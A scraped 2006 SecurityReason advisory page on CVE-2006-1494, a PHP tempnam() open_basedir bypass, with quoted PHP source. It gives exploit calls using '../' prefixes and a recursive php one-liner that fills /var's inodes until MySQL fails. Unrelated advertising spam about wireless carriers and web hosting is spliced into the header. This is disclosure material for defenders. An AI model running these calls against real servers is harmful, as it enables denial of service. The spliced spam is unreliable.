|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
| Details : SecurityReason Advisory |
|
|
Topic : tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
SecurityAlert : 36
CVE : CVE-2006-1494
SecurityRisk : Medium (About)
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 08.04.2006
Affected Software : | PHP 4.4.2 and prior
PHP 5.1.2 and prior |
The most well-renowned wireless technology brand is known as wifi which is established under the ownership of Wi-Fi Alliance. The cell phones of alltel wireless systems are very valuable and cost effective for the users of cell phone. There is an unlimited offers of cell phone services, plans and packages, provided by at&t wireless technology. The webhosting net provides the technical assistance for the implementation of the website applications in the easiest way. The webhosting reviews provides very authentic information and critical evaluation of the different hosting companies along with the exact comparison of the ratings and plans.
 Advisory Text : -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of
the PHP Conference Material is freely available.
tempnam -- Create file with unique file name
- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create file over /home
directory.
In ext/standard/file.c (PHP 4.4.2)
- -550-578---
PHP_FUNCTION(tempnam)
{
pval **arg1, **arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;
if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) ==
FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));
if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
fclose(fp);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(d);
}
- -550-578---
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir",
"../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is low issue but you can try create a lot of files and overload inodes
from HD.I have one particion.
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var
<- INODES
where mysql and apache try create some file. WWhen we overload free inodes,
system have big problem with apache, mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/",
"../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o'
(Errcode: 13)
And mysql die()!
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----
|
|
|
|
|
|
|